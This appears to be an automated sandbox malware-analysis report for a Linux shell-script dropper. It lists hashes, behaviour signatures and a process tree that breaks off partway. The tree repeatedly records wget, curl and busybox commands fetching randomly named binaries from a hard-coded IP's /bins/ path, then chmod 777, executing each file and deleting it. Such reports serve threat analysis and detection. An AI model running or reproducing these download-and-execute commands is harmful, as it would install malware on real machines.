Analysis
-
max time kernel
11s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
25/10/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
-
Size
10KB
-
MD5
1842c293913809baf3b70d2c7616a370
-
SHA1
cfb8715dfc9477769e6a4c913ce8cbf32a7c3c8a
-
SHA256
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb
-
SHA512
92c3faac1ab3b27d8d710a5629244e1de0b8ab965ed2978664b2406ff672998852b8986d72545fd5fca7e8d62f60bad51a06e90e9472642e8b22934f3ad80be5
-
SSDEEP
96:d6uPCaTjHLgukFYocSxdkV1aNhc0r0/gulc3/m6uPCalNPHXw8BbqSxdkV1PGNhv:JrgukGocSxdkV1x81u3BxdkV16
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1534 chmod 1576 chmod 1666 chmod 1660 chmod 1684 chmod 1525 chmod 1552 chmod 1594 chmod 1624 chmod 1630 chmod 1642 chmod 1564 chmod 1678 chmod 1546 chmod 1582 chmod 1600 chmod 1558 chmod 1570 chmod 1690 chmod 1540 chmod 1612 chmod 1648 chmod 1672 chmod 1588 chmod 1636 chmod 1606 chmod 1618 chmod 1654 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO 1526 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy 1535 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt 1541 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM 1547 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 1553 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn 1559 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK 1565 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq 1571 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 1577 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI 1583 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw 1589 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 1595 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj 1601 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 1607 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 1613 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj 1619 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM 1625 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 1631 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn 1637 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO 1643 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy 1649 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt 1655 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq 1661 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK 1667 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 1673 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 1679 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI 1685 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw 1691 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1614 rm 1604 curl 1605 busybox 1607 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 1608 rm 1613 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 1603 wget 1609 wget 1610 curl 1611 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI curl File opened for modification /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw curl File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM curl File opened for modification /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 curl File opened for modification /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK curl File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM curl File opened for modification /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq curl File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj curl File opened for modification /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO curl File opened for modification /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 curl File opened for modification /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy curl File opened for modification /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq curl File opened for modification /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt curl File opened for modification /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 curl File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz curl File opened for modification /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt curl File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz curl File opened for modification /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI curl File opened for modification /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK curl File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj curl File opened for modification /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 curl File opened for modification /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy curl File opened for modification /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn curl File opened for modification /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 curl File opened for modification /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn curl File opened for modification /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 curl File opened for modification /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO curl File opened for modification /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw curl
Processes
-
/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh1⤵PID:1520
-
/bin/rm/bin/rm bins.sh2⤵PID:1521
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:1524
-
-
/bin/chmodchmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:1527
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:1533
-
-
/bin/chmodchmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Executes dropped EXE
PID:1535
-
-
/bin/rmrm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:1536
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:1537
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:1539
-
-
/bin/chmodchmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Executes dropped EXE
PID:1541
-
-
/bin/rmrm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:1542
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:1543
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:1545
-
-
/bin/chmodchmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Executes dropped EXE
PID:1547
-
-
/bin/rmrm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:1548
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:1549
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:1551
-
-
/bin/chmodchmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Executes dropped EXE
PID:1553
-
-
/bin/rmrm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:1554
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:1555
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:1557
-
-
/bin/chmodchmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- File and Directory Permissions Modification
PID:1558
-
-
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Executes dropped EXE
PID:1559
-
-
/bin/rmrm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:1560
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:1561
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:1563
-
-
/bin/chmodchmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Executes dropped EXE
PID:1565
-
-
/bin/rmrm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:1566
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:1567
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:1569
-
-
/bin/chmodchmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Executes dropped EXE
PID:1571
-
-
/bin/rmrm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:1572
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:1573
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Writes file to tmp directory
PID:1574
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:1575
-
-
/bin/chmodchmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Executes dropped EXE
PID:1577
-
-
/bin/rmrm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:1578
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:1579
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:1581
-
-
/bin/chmodchmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Executes dropped EXE
PID:1583
-
-
/bin/rmrm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:1584
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:1585
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Writes file to tmp directory
PID:1586
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:1587
-
-
/bin/chmodchmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- File and Directory Permissions Modification
PID:1588
-
-
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Executes dropped EXE
PID:1589
-
-
/bin/rmrm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:1590
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:1591
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Writes file to tmp directory
PID:1592
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:1593
-
-
/bin/chmodchmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Executes dropped EXE
PID:1595
-
-
/bin/rmrm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:1596
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:1597
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Writes file to tmp directory
PID:1598
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:1599
-
-
/bin/chmodchmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- File and Directory Permissions Modification
PID:1600
-
-
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Executes dropped EXE
PID:1601
-
-
/bin/rmrm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:1602
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:1603
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1604
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:1605
-
-
/bin/chmodchmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- File and Directory Permissions Modification
PID:1606
-
-
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1607
-
-
/bin/rmrm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:1608
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:1609
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1610
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:1611
-
-
/bin/chmodchmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- File and Directory Permissions Modification
PID:1612
-
-
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1613
-
-
/bin/rmrm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:1614
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:1615
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Writes file to tmp directory
PID:1616
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:1617
-
-
/bin/chmodchmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- File and Directory Permissions Modification
PID:1618
-
-
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Executes dropped EXE
PID:1619
-
-
/bin/rmrm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:1620
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:1621
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Writes file to tmp directory
PID:1622
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:1623
-
-
/bin/chmodchmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- File and Directory Permissions Modification
PID:1624
-
-
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Executes dropped EXE
PID:1625
-
-
/bin/rmrm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:1626
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:1627
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Writes file to tmp directory
PID:1628
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:1629
-
-
/bin/chmodchmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- File and Directory Permissions Modification
PID:1630
-
-
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Executes dropped EXE
PID:1631
-
-
/bin/rmrm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:1632
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:1633
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Writes file to tmp directory
PID:1634
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:1635
-
-
/bin/chmodchmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- File and Directory Permissions Modification
PID:1636
-
-
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Executes dropped EXE
PID:1637
-
-
/bin/rmrm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:1638
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:1639
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:1641
-
-
/bin/chmodchmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Executes dropped EXE
PID:1643
-
-
/bin/rmrm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:1644
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:1645
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Writes file to tmp directory
PID:1646
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:1647
-
-
/bin/chmodchmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- File and Directory Permissions Modification
PID:1648
-
-
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Executes dropped EXE
PID:1649
-
-
/bin/rmrm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:1650
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:1651
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Writes file to tmp directory
PID:1652
-
-
